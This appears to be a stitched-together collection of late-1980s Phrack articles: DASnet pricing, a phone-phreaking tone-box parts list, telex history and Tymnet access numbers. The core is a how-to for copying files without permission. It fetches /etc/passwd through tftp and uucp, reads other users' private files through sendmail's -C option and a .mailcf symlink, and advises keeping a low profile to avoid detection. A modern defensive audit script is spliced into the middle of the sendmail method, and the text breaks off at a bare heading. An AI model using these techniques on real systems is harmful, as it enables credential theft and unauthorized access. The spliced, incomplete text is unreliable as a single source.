The only disadvantage of using DASnet as opposed to Wide-Area networks is the cost. Subscription costs as of 3/3/89 cost $4.75 per month or $5.75 per month for hosts that are outside of the USA. You are also charged for each message that you send. If you are corresponding with someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed to your account.

The following is an abbreviated cost list for mailing to the different services of DASnet:

    PARTIAL List of Services            DASnet Cost  DASnet Cost
    Linked by DASnet (e-mail)           1st 1000     Each Additional 1000
                                        Characters   Characters

    INET, MacNET, PeaceNet, Unison,
    UUCP*, Domains, e.g. .COM, .EDU*    .21          .11
    Dialcom--Any "host" in US           .36          .25
    Dialcom--Hosts outside US           .93          .83
    EasyLink (From EasyLink)            .21          .11
             (To EasyLink)              «5           .23
    US FAX (international avail.)       .79          .37
    GeoMail--Any "host" in US           .21          .11
    GeoMail--Hosts outside US           .74          .63
    MCI (from MCI)                      .21          .11
        (to MCI)                        .78          .25
        (Paper mail - USA)              2.31         .21
    Telemail                            .36          .25
    W.U. Telex--United States           1.79         1.63
      (You can also send Telexes outside the US)
    TWICS--Japan                        .89          .47

    NOTE: 20 lines of text is app. 1000 characters.

    * The charges given here are to the gateway to the network. The DASnet user is not charged for transmission on the network itself.

Subscribers to DASnet get a free DASnet Network Directory as well as a listing in the directory, and the ability to order optional DASnet services like auto-porting or DASnet Telex Service which gives you your own Telex number and answerback for $8.40 a month at this time. DASnet is a registered trademark of DA Systems, Inc.

    DA Systems, Inc.
    1503 E. Campbell Ave.
    Campbell, CA 95008
    408-559-7434
    TELEX: 910 380-3530

The following two sections on PeaceNet and AppleLink are in association with DASnet as this network is what is used to connect.

125. Phrack Magazine - Vol. 3, Issue 28 by Dispater

Introduction:

After reading the earlier renditions of schematics for the Pearl Box, I decided that there was an easier and cheaper way of doing the same thing with an IC and parts you probably have just laying around the house.

What Is A Pearl Box and Why Do I Want One?

A Pearl Box is a tone generating device that is used to make a wide range of single tones. Therefore, it would be very easy to modify this basic design to make a Blue Box by making 2 Pearl Boxes and joining them together in some fashion. A Pearl Box can be used to create any tone you wish that other boxes may not. It also has a tone sweep option that can be used for numerous things like detecting different types of phone tapping devices.
Parts List:

· CD4049 RCA integrated circuit
· .1 uF disk capacitor
· 1 uF 16V electrolytic capacitor
· 1K resistor
· 10M resistor
· 1Meg pot
· 1N914 diode
· Some SPST momentary push-button switches
· 1 SPDT toggle switch
· 9 Volt battery & clip and miscellaneous stuff you should have laying around the house.

State-of-the-Art-Text Schematic:

[Text schematic not recoverable from this copy. Labels that survive: "+ 16V 1uF -", "8ohms", "CD4049UBE" with pins 1-16, battery terminals [-] and [+], "1N914", "10M", ".1uF 50V", "[Toggle Switch]", "1K", and the note "These 2 wires to the center pole of switch."]

126. Phrack Magazine - Vol. 3, Issue 28 by Dark OverLord

There are many ways of getting copies of files from a remote system that you do not have permission to read or an account on login on to and access them through. Many administrators do not even bother to restrict many access points that you can use. Here are the simplest ways:

1.Use tftp(1) [Trivial File Transfer Protocol] to retrieve a copy of a file if you are running on an Internet based network.
2.Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if uucp connections are running on that system.
3.Access one of many known security loopholes.

In the following examples, we will use the passwd file as the file to acquire since it is a readable file that can be found on most systems that these attacks are valid on.
Method A :

1.First start the tftp program: Enter the command:

    tftp

  [You have the following prompt:]

    tftp>

2.The next step is to connect to the system that you wish to retrieve files from. At the tftp, type:

    tftp> connect other.system.com

3.Now request the file you wish to get a copy of (in our case, the passwd file /etc/passwd ):

    tftp> get /etc/passwd /tmp/passwd

  [You should see something that looks like the following:]

    Received 185659 bytes in 22 seconds.

4.Now exit the tftp program with the "quit" command:

    tftp> quit

You should now have a copy of other.system.com's passwd file in your directory.

NOTE: Some Unix systems' tftp programs have a different syntax. The above was tested under SunOS 4.0. For example, on Apollos, the syntax is:

    tftp -{g|g!|p|r|w} [netascii|image]

Thus you must use the command:

    tftp -g password_file networked-host /etc/passwd

Consult your local "man" pages for more info (or in other words RTFM). At the end of this article, I will include a shell script that will snarf a password file from a remote host. To use it type:

    gpw system_name

Method B :

Assuming we are getting the file /etc/passwd from the system uusucker, and our system has a direct uucp connection to that system, it is possible to request a copy of the file through the uucp links. The following command will request that a copy of the passwd file be copied into uucp's home directory /usr/spool/uucppublic :

    uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'

The flag "-m" means you will be notified by mail when the transfer is completed.

Method C:

The third possible way to access the desired file requires that you have the login permission to the system. In this case we will utilize a well-known bug in Unix's sendmail daemon. The sendmail program has an option "-C" in which you can specify the configuration file to use (by default this file is /usr/lib/sendmail.cf or /etc/sendmail.cf).
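Method A above depends on the remote tftp daemon serving any world-readable file rather than one restricted directory. The script below is an added example from the administrator's side, not part of the original article: it audits an inetd.conf-style file for that condition. The sample file contents, the function names audit_tftp and write_sample, and the use of "-s <directory>" as the daemon's restricted-directory flag (as in SunOS in.tftpd and later tftpd implementations) are assumptions of the example.

```shell
#!/bin/sh
# Added example, not from the original article.
# Audits an inetd.conf-style file for tftp entries that serve the whole
# filesystem, which is the condition Method A relies on.

# write_sample FILE: write a constructed SunOS-style inetd.conf to FILE.
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample data, not taken from a real host
ftp     stream  tcp  nowait  root  /usr/etc/in.ftpd   in.ftpd
tftp    dgram   udp  wait    root  /usr/etc/in.tftpd  in.tftpd
#tftp   dgram   udp  wait    root  /usr/etc/in.tftpd  in.tftpd -s /tftpboot
EOF
}

# audit_tftp FILE
# Prints one line per active (uncommented) tftp entry:
#   OPEN <line>              daemon started with no restricted directory
#   RESTRICTED <line> <dir>  daemon started with -s <dir> (assumed flag)
# Exit status is 1 if any OPEN entry exists, otherwise 0.
audit_tftp() {
    awk '
        BEGIN { bad = 0 }
        /^[ \t]*#/ || NF == 0 { next }      # comments and blank lines
        $1 != "tftp" { next }               # only the tftp service
        {
            # Fields: service socket proto wait user server-path argv...
            dir = ""
            for (i = 7; i < NF; i++)
                if ($i == "-s") { dir = $(i + 1); break }
            # "-s /" restricts nothing, so it is reported as open.
            if (dir == "" || dir == "/") { print "OPEN " NR; bad = 1 }
            else print "RESTRICTED " NR " " dir
        }
        END { exit bad }
    ' "$1"
}

# Demonstration on the constructed sample.
sample=$(mktemp)
write_sample "$sample"
audit_tftp "$sample" || echo "tftp serves files outside a restricted directory"
rm -f "$sample"
```

On a real host, point audit_tftp at /etc/inetd.conf; an OPEN line means the service should be disabled or restarted with a restricted directory.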
It should also be noted that the diagnostics outputted by sendmail contain the offending lines of text. Also note that the sendmail program runs setuid root. The way you can abuse this set of facts (if you have not yet guessed) is by specifying the file you wish read as the configuration file. Thus the command:

    sendmail -C/usr/accounts/random_joe/private/file

will give you a copy of random joe's private file. Another similar trick is to symlink your .mailcf file to joe's file and mail someone. When mail executes sendmail (to send the mail), it will load in your mailcf and barf out joe's stuff. First, link joe's file to your .mailcf .

    ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf

Next, send mail to someone.

    mail C488869@umcvmb.missouri.edu

127.Phrack Magazine - Vol. 3, Issue 30 by Phone Phanatic

"Until a few years ago -- maybe ten -- it was very common to see TWX and Telex machines in almost every business place."

There were only minor differences between Telex and TWX. The biggest difference was that the former was always run by Western Union, while the latter was run by the Bell System for a number of years. TWX literally meant "(T)ype(W)riter e(x)change," and it was Bell's answer to competition from Western Union. There were "three row" and "four row" machines, meaning the number of keys on the keyboard and how they were laid out. The "three row" machines were simply part of the regular phone network; that is, they could dial out and talk to another TWX also connected on regular phone lines. Eventually these were phased out in favor of "newer and more improved" machines with additional keys, as well as a paper tape reader attachment which allowed sending the same message repeatedly to many different machines. These "four row" machines were not on the regular phone network, but were assigned their own area codes (410-510-610-710-810-910) where they still remain today.
The only way a four row machine could call a three row machine or vice-versa was through a gateway of sorts which translated some of the character set unique to each machine. Western Union's network was called Telex and in addition to being able to contact (by dial up) other similar machines, Telex could connect with TWX (and vice-versa) as well as all the Western Union public offices around the country. Until the late 1950's or early 1960's, every small town in America had a Western Union office. Big cities like Chicago had perhaps a dozen of them, and they used messengers to hand deliver telegrams around town. Telegrams could be placed in person at any public office, or could be called in to the nearest public office. By arrangement with most telcos, the Western Union office in town nearly always had the phone number 4321, later supplemented in automated exchanges with some prefix XXX-4321. Telegrams could be charged to your home phone bill (this is still the case in some communities) and from a coin phone, one did not ask for 4321, but rather, called the operator and asked for Western Union. This was necessary since once the telegram had been given verbally to the wire clerk, s/he in turn had to flash the hook and get your operator back on the line to tell them "collect five dollars and twenty cents" or whatever the cost was. Telegrams, like phone calls, could be sent collect or billed third party. If you had an account with Western Union, i.e. a Telex machine in your office, you could charge the calls there, but most likely you would simply send the telegram from there in the first place. Sometime in the early 1960's, Western Union filed suit against AT&T asking that they turn over their TWX business to them. They cited an earlier court ruling, circa 1950's, which said AT&T was prohibited from acquiring any more telephone operating companies except under certain conditions. 
The Supreme Court agreed with Western Union that "spoken messages" were the domain of Ma Bell, but "written messages" were the domain of Western Union. So Bell was required to divest itself of the TWX network, and Western Union has operated it since, although a few years ago they began phasing out the phrase "TWX" in favor of "Telex II"; their original device being "Telex I" of course. TWX still uses ten digit dialing with 610 (Canada) or 710/910 (USA) being the leading three digits. Apparently 410-510 have been abandoned; or at least they are used very little, and Bellcore has assigned 510 to the San Francisco area starting in a year or so. 410 still has some funny things on it, like the Western Union "Infomaster," which is a computer that functions like a gateway between Telex, TWX, EasyLink and some other stuff. Today, the Western Union network is but a skeleton of its former self. Now most of their messages are handled on dial up terminals connected to the public phone network. It has been estimated the TWX/Telex business is about fifty percent of what it was a decade ago, if that much. Then there was the Time Service, a neat thing which Western Union offered for over seventy years, until it was discontinued in the middle 1960's. The Time Service provided an important function in the days before alternating current was commonly available. For example, Chicago didn't have AC electricity until about 1945. Prior to that we used DC, or direct current. Well, to run an electric clock, you need 60 cycles AC current for obvious reasons, so prior to the conversion from DC power to AC power, electric wall clocks such as you see in every office were unheard of. How were people to tell the time of day accurately? Enter the Western Union clock. The Western Union, or "telegraph clock" was a spring driven wind up clock, but with a difference. The clocks were "perpetually self-winding," manufactured by the Self-Winding Clock Company of New York City. 
They had large batteries inside them, known as "telephone cells" which had a life of about ten years each. A mechanical contrivance in the clock would rotate as the clock spring unwound, and once each hour would cause two metal clips to contact for about ten seconds, which would pass juice to the little motor in the clock which in turn re-wound the main spring. The principle was the same as the battery operated clocks we see today. The battery does not actually run the clock -- direct current can't do that -- but it does power the tiny motor which re-winds the spring which actually drives the clock. The Western Union clocks came in various sizes and shapes, ranging from the smallest dials which were nine inches in diameter to the largest which were about eighteen inches in diameter. Some had sweep second hands; others did not. Some had a little red light bulb on the front which would flash. The typical model was about sixteen inches, and was found in offices, schools, transportation depots, radio station offices, and of course in the telegraph office itself. The one thing all the clocks had in common was their brown metal case and cream-colored face, with the insignia "Western Union" and their corporate logo in those days which was a bolt of electricity, sort of like a letter "Z" laying on its side. And in somewhat smaller print below, the words "Naval Observatory Time." The local clocks in an office or school or wherever were calibrated by a "master clock" (actually a sub-master) on the premises. Once an hour on the hour, the (sub) master clock would drop a metal contact for just a half second, and send about nine volts DC up the line to all the local clocks. They in turn had a "tolerance" of about two minutes on both sides of the hour so that the current coming to them would yank the minute hand exactly upright onto the twelve from either direction if the clock was fast or slow. 
The sub-master clocks in each building were in turn serviced by the master clock in town; usually this was the one in the telegraph office. Every hour on the half hour, the master clock in the telegraph office would throw current to the sub-masters, yanking them into synch as required. And as for the telegraph offices themselves, they were serviced twice a day by -- you guessed it -- the Naval Observatory Master clock in Our Nation's Capitol, by the same routine. Someone there would press half a dozen buttons at the same time, using all available fingers; current would flow to every telegraph office and synch all the master clocks in every community. Western Union charged fifty cents per month for the service, and tossed the clock in for free! Oh yes, there was an installation charge of about two dollars when you first had service (i.e. a clock) installed. The clocks were installed and maintained by the "clockman," a technician from Western Union who spent his day going around hanging new clocks, taking them out of service, changing batteries every few years for each clock, etc. What a panic it was for them when "war time" (what we now call Daylight Savings Time) came around each year! Wally, the guy who serviced all the clocks in downtown Chicago had to start on *Thursday* before the Sunday official changeover just to finish them all by *Tuesday* following. He would literally rush in an office, use his screwdriver to open the case, twirl the hour hand around one hour forward in the spring, (or eleven hours *forward* in the fall since the hands could not be moved backward beyond the twelve going counterclockwise), slam the case back on, screw it in, and move down the hall to the next clock and repeat the process. He could finish several dozen clocks per day, and usually the office assigned him a helper twice a year for these events. 
He said they never bothered to line the minute hand up just right, because it would have taken too long, and ".....anyway, as long as we got it within a minute or so, it would synch itself the next time the master clock sent a signal..." Working fast, it took a minute to a minute and a half to open the case, twirl the minute hand, put the case back on, "stop and BS with the receptionist for a couple seconds" and move along. The master clock sent its signal over regular telco phone lines. Usually it would terminate in the main office of whatever place it was, and the (sub) master there would take over at that point. Wally said it was very important to do a professional job of hanging the clock to begin with. It had to be level, and the pendulum had to be just right, otherwise the clock would gain or lose more time than could be accommodated in the hourly synching process. He said it was a very rare clock that actually was out by even a minute once an hour, let alone the two minutes of tolerance built into the gear works. "...Sometimes I would come to work on Monday morning, and find out in the office that the clock line had gone open Friday evening. So nobody all weekend got a signal. Usually I would go down a manhole and find it open someplace where one of the Bell guys messed it up, or took it off and never put it back on. To find out where it was open, someone in the office would 'ring out' the line; I'd go around downtown following the loop as we had it laid out, and keep listening on my headset for it. When I found the break or the open, I would tie it down again and the office would release the line; but then I had to go to all the clocks *before* that point and restart them, since the constant current from the office during the search had usually caused them to stop." But he said, time and again, the clocks were usually so well mounted and hung that "...it was rare we would find one so far out of synch that we had to adjust it manually. 
Usually the first signal to make it through once I repaired the circuit would yank everyone in town to make up for whatever they lost or gained over the weekend..."

In 1965, Western Union decided to discontinue the Time Service. In a nostalgic letter to subscribers, they announced their decision to suspend operations at the end of the current month, but said "for old time's sake" anyone who had a clock was welcome to keep it and continue using it; there just would not be any setting signals from the master clocks any longer. Within a day or two of the official announcement, every Western Union clock in the Chicago area headquarters building was gone. The executives snatched them off the wall, and took them home for the day when they would have historical value. All the clocks in the telegraph offices disappeared about the same time, to be replaced with standard office-style electric wall clocks.

128.Phrack Magazine - Vol. 3, Issue 30 by Synthecide

There are literally hundreds of systems connected to some of these larger networks, like Tymnet and Telenet. Navigation around these networks is very simple, and usually well explained in their on-line documentation. Furthermore, some systems will actually tell you what is connected and how to get to it. In the case of Tymnet, after dialing in, at the log in prompt, type "information" for the on-line documentation. Accessing systems through networks is as simple as providing an address for it to connect to. The best way to learn about the addresses and how to do things on a network is to read "A Novice's Guide to Hacking (1989 Edition)" which was in Issue 22, File 4 of 12, Volume Two (December 23, 1988). Some points are reiterated here.

Once on a network, you provide the NUA (network user address) of the system you wish to connect to. NUAs are strings of 15 digits, broken up into 3 fields, the NETWORK ADDRESS, the AREA PREFIX, and the DNIC. Each field has 5 digits and is left-padded with 0's where necessary.
The DNIC determines which network to take the address from. Tymnet, for example, is 03106. 03110 is Telenet. The AREA PREFIX and NETWORK ADDRESS determine the connection point. By providing the address of the system that you wish to connect to, you will be accessing it through the net... as if you were calling it directly. Obviously, then, this provides one more level of security for access. By connecting to an outdial, you can increase again the level of security you enjoy, by using the outdial in that area to connect to the remote system.

Addendum -- Accessing Tymnet Over Local Packet Networks

This is just another way to get that extra step and/or bypass other routes. This table is copied from Tymnet's on-line information. As said earlier, it's a great resource, this on-line information!

BELL ATLANTIC

NODE   CITY                  STATE          SPEED     ACCESS NUMBER  NETWORK
03526  DOVER                 DELAWARE       300/2400  302/734-9465   @PDN
03526  GEORGETOWN            DELAWARE       300/2400  302/856-7055   @PDN
03526  NEWARK                DELAWARE       300/2400  302/366-0800   @PDN
03526  WILMINGTON            DELAWARE       300/1200  302/428-0030   @PDN
03526  WILMINGTON            DELAWARE       2400      302/655-1144   @PDN
06254  WASHINGTON            DIST. OF COL.  300/1200  202/479-7214   @PDN
06254  WASHINGTON(MIDTOWN)   DIST. OF COL.  2400      202/785-1688   @PDN
06254  WASHINGTON(DOWNTOWN)  DIST. OF COL.  300/1200  202/393-6003   @PDN
06254  WASHINGTON(MIDTOWN)   DIST. OF COL.  300/1200  202/293-4641   @PDN
06254  WASHINGTON            DIST. OF COL.  300/1200  202/546-5549   @PDN
06254  WASHINGTON            DIST. OF COL.  300/1200  202/328-0619   @PDN
06254  BETHESDA              MARYLAND       300/1200  301/986-9942   @PDN
06254  COLESVILLE            MARYLAND       300/2400  301/989-9324   @PDN
06254  HYATTSVILLE           MARYLAND       300/1200  301/779-9935   @PDN
06254  LAUREL                MARYLAND       300/2400  301/490-9971   @PDN
06254  ROCKVILLE             MARYLAND       300/1200  301/340-9903   @PDN
06254  SILVER SPRING         MARYLAND       300/1200  301/495-9911   @PDN
07771  BERNARDSVILLE         NEW JERSEY     300/2400  201/766-7138   @PDN
07771  CLINTON               NEW JERSEY     300-1200  201/730-8693   @PDN
07771  DOVER                 NEW JERSEY     300/2400  201/361-9211   @PDN
07771  EATONTOWN/RED BANK    NEW JERSEY     300/2400  201/758-8000   @PDN
07771  ELIZABETH             NEW JERSEY     300/2400  201/289-5100   @PDN
07771  ENGLEWOOD             NEW JERSEY     300/2400  201/871-3000   @PDN
07771  FREEHOLD              NEW JERSEY     300/2400  201/780-8890   @PDN
07771  HACKENSACK            NEW JERSEY     300/2400  201/343-9200   @PDN
07771  JERSEY CITY           NEW JERSEY     300/2400  201/659-3800   @PDN
07771  LIVINGSTON            NEW JERSEY     300/2400  201/533-0561   @PDN
07771  LONG BRANCH/RED BANK  NEW JERSEY     300/2400  201/758-8000   @PDN
07771  MADISON               NEW JERSEY     300/2400  201/593-0004   @PDN
07771  METUCHEN              NEW JERSEY     300/2400  201/906-9500   @PDN
07771  MIDDLETOWN            NEW JERSEY     300/2400  201/957-9000   @PDN
07771  MORRISTOWN            NEW JERSEY     300/2400  201/455-0437   @PDN
07771  NEWARK                NEW JERSEY     300/2400  201/623-0083   @PDN
07771  NEW BRUNSWICK         NEW JERSEY     300/2400  201/247-2700   @PDN
07771  NEW FOUNDLAND         NEW JERSEY     300/2400  201/697-9380   @PDN
07771  PASSAIC               NEW JERSEY     300/2400  201/473-6200   @PDN
07771  PATERSON              NEW JERSEY     300/2400  201/345-7700   @PDN
07771  PHILLIPSBURG          NEW JERSEY     300/2400  201/454-9270   @PDN
07771  POMPTON LAKES         NEW JERSEY     300/2400  201/835-8400   @PDN
07771  RED BANK              NEW JERSEY     300/2400  201/758-8000   @PDN
07771  RIDGEWOOD             NEW JERSEY     300/2400  201/445-4800   @PDN
07771  SOMERVILLE            NEW JERSEY     300/2400  201/218-1200   @PDN
07771  SOUTH RIVER           NEW JERSEY     300/2400  201/390-9100   @PDN
07771  SPRING LAKE           NEW JERSEY     300/2400  201/974-0850   @PDN
07771  TOMS RIVER            NEW JERSEY     300/2400  201/286-3800   @PDN
07771  WASHINGTON            NEW JERSEY     300/2400  201/689-6894   @PDN
07771  WAYNE/PATERSON        NEW JERSEY     300/2400  201/345-7700   @PDN
03526  ALLENTOWN             PENNSYLVANIA   300/1200  215/435-0266   @PDN
11301  ALTOONA               PENNSYLVANIA   300/1200  814/946-8639   @PDN
11301  ALTOONA               PENNSYLVANIA   2400      814/949-0505   @PDN
03526  AMBLER                PENNSYLVANIA   300/1200  215/283-2170   @PDN
10672  AMBRIDGE              PENNSYLVANIA   300/1200  412/266-9610   @PDN
10672  CARNEGIE              PENNSYLVANIA   300/1200  412/276-1882   @PDN
10672  CHARLEROI             PENNSYLVANIA   300/1200  412/483-9100   @PDN
03526  CHESTER HEIGHTS       PENNSYLVANIA   300/1200  215/358-0820   @PDN
03526  COATESVILLE           PENNSYLVANIA   300/1200  215/383-7212   @PDN
10672  CONNELLSVILLE         PENNSYLVANIA   300/1200  412/628-7560   @PDN
03526  DOWNINGTON/COATES.    PENNSYLVANIA   300/1200  215/383-7212   @PDN
03562  DOYLESTOWN            PENNSYLVANIA   300/1200  215/340-0052   @PDN
03562  GERMANTOWN            PENNSYLVANIA   300/1200  215-843-4075   @PDN
10672  GLENSHAW              PENNSYLVANIA   300/1200  412/487-6868   @PDN
10672  GREENSBURG            PENNSYLVANIA   300/1200  412/836-7840   @PDN
11301  HARRISBURG            PENNSYLVANIA   300/1200  717/236-3274   @PDN
11301  HARRISBURG            PENNSYLVANIA   2400      717/238-0450   @PDN
10672  INDIANA               PENNSYLVANIA   300/1200  412/465-7210   @PDN
03526  KING OF PRUSSIA       PENNSYLVANIA   300/1200  215/270-2970   @PDN
03526  KIRKLYN               PENNSYLVANIA   300/1200  215/789-5650   @PDN
03526  LANSDOWNE             PENNSYLVANIA   300/1200  215/626-9001   @PDN
10672  LATROBE               PENNSYLVANIA   300/1200  412/537-0340   @PDN
11301  LEMOYNE/HARRISBURG    PENNSYLVANIA   300/1200  717/236-3274   @PDN
10672  MCKEESPORT            PENNSYLVANIA   300/1200  412/673-6200   @PDN
10672  NEW CASTLE            PENNSYLVANIA   300/1200  412/658-5982   @PDN
10672  NEW KENSINGTON        PENNSYLVANIA   300/1200  412/337-0510   @PDN
03526  NORRISTOWN            PENNSYLVANIA   300/1200  215/270-2970   @PDN
03526  PAOLI                 PENNSYLVANIA   300/1200  215/648-0010   @PDN
03562  PHILADELPHIA          PENNSYLVANIA   300/1200  215/923-7792   @PDN
03562  PHILADELPHIA          PENNSYLVANIA   300/1200  215/557-0659   @PDN
03562  PHILADELPHIA          PENNSYLVANIA   300/1200  215/545-7886   @PDN
03562  PHILADELPHIA          PENNSYLVANIA   300/1200  215/677-0321   @PDN
03562  PHILADELPHIA          PENNSYLVANIA   2400      215/625-0770   @PDN
10672  PITTSBURGH            PENNSYLVANIA   300/1200  412/281-8950   @PDN
10672  PITTSBURGH            PENNSYLVANIA   300/1200  412-687-4131   @PDN
10672  PITTSBURGH            PENNSYLVANIA   2400      412/261-9732   @PDN
10672  POTTSTOWN             PENNSYLVANIA   300/1200  215/327-8032   @PDN
03526  QUAKERTOWN            PENNSYLVANIA   300/1200  215/538-7032   @PDN
03526  READING               PENNSYLVANIA   300/1200  215/375-7570   @PDN
10672  ROCHESTER             PENNSYLVANIA   300/1200  412/728-9770   @PDN
03526  SCRANTON              PENNSYLVANIA   300/1200  717/348-1123   @PDN
03526  SCRANTON              PENNSYLVANIA   2400      717/341-1860   @PDN
10672  SHARON                PENNSYLVANIA   300/1200  412/342-1681   @PDN
03526  TULLYTOWN             PENNSYLVANIA   300/1200  215/547-3300   @PDN
10672  UNIONTOWN             PENNSYLVANIA   300/1200  412/437-5640   @PDN
03562  VALLEY FORGE          PENNSYLVANIA   300/1200  215/270-2970   @PDN
10672  WASHINGTON            PENNSYLVANIA   300/1200  412/223-9090   @PDN
03526  WAYNE                 PENNSYLVANIA   300/1200  215/341-9605   @PDN
10672  WILKINSBURG           PENNSYLVANIA   300/1200  412/241-1006   @PDN
06254  ALEXANDRIA            VIRGINIA       300/1200  703/683-6710   @PDN
06254  ARLINGTON             VIRGINIA       300/1200  703/524-8961   @PDN
06254  FAIRFAX               VIRGINIA       300/1200  703/385-1343   @PDN
06254  MCLEAN                VIRGINIA       300/1200  703/848-2941   @PDN

@PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)

(CONNECT MESSAGE)
...<CR>                              (SYNCHRONIZES DATA SPEEDS)
WELCOME TO THE BPA/DST PDN
*.T <CR>                             (TYMNET ADDRESS)
131069                               (ADDRESS CONFIRMATION - TYMNET DNIC)
COM                                  (CONFIRMATION OF CALL SET-UP)
-GWY 0XXXX- TYMNET: PLEASE LOG IN:   (HOST # WITHIN DASHES)

BELL SOUTH

NODE   CITY                  STATE          DENSITY   ACCESS NUMBER  MODEM
10207  ATLANTA               GEORGIA        300/1200  404/261-4633   @PLSK
10207  ATHENS                GEORGIA        300/1200  404/354-0614   @PLSK
10207  COLUMBUS              GEORGIA        300/1200  404/324-5771   @PLSK
10207  ROME                  GEORGIA        300/1200  404/234/7542   @PLSK

@PLSK BELLSOUTH - NETWORK NAME IS PULSELINK

(CONNECT MESSAGE)
... <CR>                             (SYNCHRONIZES DATA SPEEDS)
                                     (DOES NOT ECHO TO THE TERMINAL)
CONNECTED
PULSELINK
13106                                (TYMNET ADDRESS)
                                     (DOES NOT ECHO TO THE TERMINAL)
PULSELINK: CALL CONNECTED TO 1 3106
-GWY 0XXXX- TYMNET: PLEASE LOG IN:   (HOST # WITHIN DASHES)

PACIFIC BELL

NODE   CITY                  STATE          DENSITY   ACCESS NUMBER  NETWORK
03306  BERKELEY              CALIFORNIA     300/1200  415-548-2121   @PPS
06272  EL SEGUNDO            CALIFORNIA     300/1200  213-640-8548   @PPS
06272  FULLERTON             CALIFORNIA     300/1200  714-441-2777   @PPS
06272  INGLEWOOD             CALIFORNIA     300/1200  213-216-7667   @PPS
06272  ANGELES(DOWNTOWN)     CALIFORNIA     300/1200  213-687-3727   @PPS
06272  LOS ANGELES           CALIFORNIA     300/1200  213-480-1677   @PPS
03306  MOUNTAIN VIEW         CALIFORNIA     300/1200  415-960-3363   @PPS
03306  OAKLAND               CALIFORNIA     300/1200  415-893-9889   @PPS
03306  PALO ALTO             CALIFORNIA     300/1200  415-325-4666   @PPS
06272  PASADENA              CALIFORNIA     300/1200  818-356-0780   @PPS
03306  SAN FRANCISCO         CALIFORNIA     300/1200  415-543-8275   @PPS
03306  SAN FRANCISCO         CALIFORNIA     300/1200  415-626-5380   @PPS
03306  SAN FRANCISCO         CALIFORNIA     300/1200  415-362-2280   @PPS
03306  SAN JOSE              CALIFORNIA     300/1200  408-920-0888   @PPS
06272  SANTA ANNA            CALIFORNIA     300/1200  714-972-9844   @PPS
06272  VAN NUYS              CALIFORNIA     300/1200  818-780-1066   @PPS

@PPS PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)

(CONNECT MESSAGE)
...<CR>                              (SYNCHRONIZES DATA SPEEDS)
                                     (DOES NOT ECHO TO THE TERMINAL)
ONLINE 1200
WELCOME TO PPS: 415-XXX-XXXX
131069                               (TYMNET ADDRESS)
                                     (DOES NOT ECHO UNTIL TYMNET RESPONDS)
-GWY 0XXXX- TYMNET: PLEASE LOG IN:   (HOST # WITHIN DASHES)

SOUTHERN NEW ENGLAND

NODE   CITY                  STATE          DENSITY   ACCESS NUMBERS NETWORK
02727  BRIDGEPORT            CONNECTICUT    300/2400  203/366-6972   @CONNNET
02727  BRISTOL               CONNECTICUT    300/2400  203/589-5100   @CONNNET
02727  CANAAN                CONNECTICUT    300/2400  203/824-5103   @CONNNET
02727  CLINTON               CONNECTICUT    300/2400  203/669-4243   @CONNNET
02727  DANBURY               CONNECTICUT    300/2400  203/743-2906   @CONNNET
02727  DANIELSON             CONNECTICUT    300/2400  203/779-1880   @CONNNET
02727  HARTFORD/MIDDLETOWN   CONNECTICUT    300/2400  203/724-6219   @CONNNET
02727  MERIDEN               CONNECTICUT    300/2400  203/237-3460   @CONNNET
02727  NEW HAVEN             CONNECTICUT    300/2400  203/776-1142   @CONNNET
02727  NEW LONDON            CONNECTICUT    300/2400  203/443-0884   @CONNNET
02727  NEW MILFORD           CONNECTICUT    300/2400  203/355-0764   @CONNNET
02727  NORWALK               CONNECTICUT    300/2400  203/866-5305   @CONNNET
02727  OLD GREENWICH         CONNECTICUT    300/2400  203/637-8872   @CONNNET
02727  OLD SAYBROOK          CONNECTICUT    300/2400  203/388-0778   @CONNNET
02727  SEYMOUR               CONNECTICUT    300/2400  203/881-1455   @CONNNET
02727  STAMFORD              CONNECTICUT    300/2400  203/324-9701   @CONNNET
02727  STORRS                CONNECTICUT    300/2400  203/429-4243   @CONNNET
02727  TORRINGTON            CONNECTICUT    300/2400  203/482-9849   @CONNNET
02727  WATERBURY             CONNECTICUT    300/2400  203/597-0064   @CONNNET
02727  WILLIMANTIC           CONNECTICUT    300/2400  203/456-4552   @CONNNET
02727  WINDSOR               CONNECTICUT    300/2400  203/688-9330   @CONNNET
02727  WINDSOR LCKS/ENFIELD  CONNECTICUT    300/2400  203/623-9804   @CONNNET

@CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IS CONNNET

(CONNECT MESSAGE)
HH<CR>                               (SYNCHRONIZES DATA SPEEDS)
                                     (DOES NOT ECHO TO THE TERMINAL)
CONNNET
.T<CR>                               (MUST BE CAPITAL LETTERS)
26-SEP-88 18:33                      (DATA)
031069                               (ADDRESS CONFIRMATION)
COM                                  (CONFIRMATION OF CALL SET-UP)
-GWY 0XXXX- TYMNET: PLEASE LOG IN:

SOUTHWESTERN BELL

NODE   CITY                  STATE          DENSITY   ACCESS NUMBERS NETWORK
05443  KANSAS CITY           KANSAS         300/1200  316/225-9951   @MRLK
05443  HAYS                  KANSAS         300/1200  913/625-8100   @MRLK
05443  HUTCHINSON            KANSAS         300/1200  316/669-1052   @MRLK
05443  LAWRENCE              KANSAS         300/1200  913/841-5580   @MRLK
05443  MANHATTAN             KANSAS         300/1200  913/539-9291   @MRLK
05443  PARSONS               KANSAS         300/1200  316/421-0620   @MRLK
05443  SALINA                KANSAS         300/1200  913/825-4547   @MRLK
05443  TOPEKA                KANSAS         300/1200  913/235-1909   @MRLK
05443  WICHITA               KANSAS         300/1200  316/269-1996   @MRLK
04766  BRIDGETON/ST. LOUIS   MISSOURI       300/1200  314/622-0900   @MRLK
04766  ST. LOUIS             MISSOURI       300/1200  314/622-0900   @MRLK

On a side note, the recent book The Cuckoo's Egg provides some interesting information (in the form of a story, however) on a Tymnet hacker. Remember that he was into BIG things, and hence he was cracked down upon. If you keep a low profile, networks should provide a good access method. If you can find a system that is connected to the Internet that you can get on from Tymnet, you are doing well.

129.Phrack Magazine - Vol. 3, Issue 30 by Dedicated Link

INTRODUCTION

